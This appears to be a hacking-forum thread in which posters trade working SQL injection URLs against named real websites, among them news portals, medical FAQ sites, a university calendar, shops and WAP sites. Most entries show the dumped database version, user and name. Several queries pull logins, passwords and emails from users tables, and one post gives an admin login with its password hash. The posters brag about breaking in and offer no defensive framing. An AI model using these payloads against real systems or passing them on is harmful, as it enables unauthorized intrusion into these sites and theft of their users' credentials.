http://www.itscoldoutside.com/ Code: http://www.itscoldoutside.com/news.asp?id=1+or+1=(select+top+1+id+from+dtproperties)-- version: Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) db_name: ICONews system_user: Clive Here is what I managed to extract: P.S. First time.
Site: (sibmedia.ru) News portal. SQL: Code: http://sibmedia.ru/index.php?id=-10220+union+select+CONCAT_WS(CHAR(32,58,32%20%20),user(),database(),%20version()),null,2-- See the result at the top. Tables:
Code: http://www.ckat.ru/keywords/answer.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())/* Uwww63S@localhost:udb63:4.1.21-log Code: http://www.venereology.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9 mgido@localhost:mgido:5.0.45 Code: http://www.infomedical.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9 infomedical@localhost:infomedical:5.0.45
Code: http://www.beadstreet.com.au/listproducts.php?id=47+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1 version():4.1.20 database():beadstreet user():beadstre@localhost __ Code: http://www.bpsca.co.uk/products.php?id=147+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11+limit+1,1/* version():4.1.22-standard: database():bpsca_data user():bpsca_website@localhost __ Code: http://www.etver.ru/1forum/viewmessage.php?sid=1&id=29140+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9 version():5.0.77-log database():etver user():etver@localhost
http://vikings.vcsu.edu/php/details.php?id=-563'+union+select+1,2,table_name,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+879,1000+--+ All the tables are locked((
cinema.perm.ru Code: http://cinema.perm.ru/events/?id=-67+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6-- version():4.0.24_Debian-10sarge2-log database():dbcinema user():cinema@localhost
<<RUNAWAYBOX>> Code: http://www.runawaybox.com/video.php?vid=-396+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9--+ Code: http://www.runawaybox.com/admin/ 5.0.45:runawaybox:runawaybox@localhostortbld-freebsd6.2 -=admin=- log: runawaybox pass: $1$0lRFi.9p$5vaDEIDcwC/b/aQu/H1.g1 ):
online game thx for Saint mssql-inj login field, result in the URL ==================================================================================== version():4 ;( ==================================================================================== concat_ws(0x3a,version(),user(),database()):5.0.67-log:[email protected]:u30200
http://www.jc.edu/calendar/details.php?id=-4265+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11+from+information_schema.tables/*
Code: http://www.raznosvet.com/do/notice.php?id=-7590+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10-- version: 4.0.27-max-log database: razno user: [email protected] I also hacked a travel agency's site (mssql); I won't post it for now.
www.petpsych.com Code: http://www.petpsych.com/article_detail.php?id=-1+union+select+1,2,3,4,5,6-- version():5.0.67-community database():petpsych_main user():petpsych_petpsyc@localhost
<<msong.com.ru>> Code: http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name,table_schema),3,4,5,6,7,8,9+from+information_schema.tables--+ 5.0.22:::admin_song1:::admin_song1@localhost:::redhat-linux-gnu - 3 tables where columns: password Code: http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name,table_schema),3,4,5,6,7,8,9+from+information_schema.columns+where+column_name+like+'password'+limit+3,1--+
http://wap.jamango.ru/mangotop/index.php?action=top100&cat=-4+union+select+1,2,3,4,concat_ws(0x3a,url,email,password)+from+top_users/*
Let's keep breaking WAP sites http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(version(),0x3a, user(),0x3a,database())/* 5.0.45-community-nt:likenetru@localhost:likenet take the accounts from the users table http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(login,0x3a,password,0x3a,email)+from+ users/*
Code: http://www.zbulvar.ru/wap/newz.php?newsid=21498+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+limit+1,1/* version():5.0.32-Debian_7etch8-log database():zbulvar_pm user():zbulvar_pm@localhost
http://www.roymagazine.it/time/display.php?ID=179/**/UNION/**/SELECT/**/password,userid+from+user/* Database name: Sql33637_1 User name: [email protected] Database Version: 4.0.30-standard-log
Code: http://www.envapack.com/b2b/buyoffers.php?cid=-3+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+70,1# 5.0.67-community envapack_b2b envapack_root@localhost Tables:
_http://egenius.ru/seminar/arc.php?cid=-4+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9+-- version:user:database 5.0.67-log:[email protected]:u96975_eg
<<little dolphins>> http://www.ptpi-dolphins.org/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7-- plbginf_ptpi@localhost:plbginf_ptpi:5.0.67-community
Code: http://wap.novonews.lv/index.php?mode=news&id=72419%27+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15+limit+1,1/* version():5.0.22-log database():novonews_v2 user():[email protected]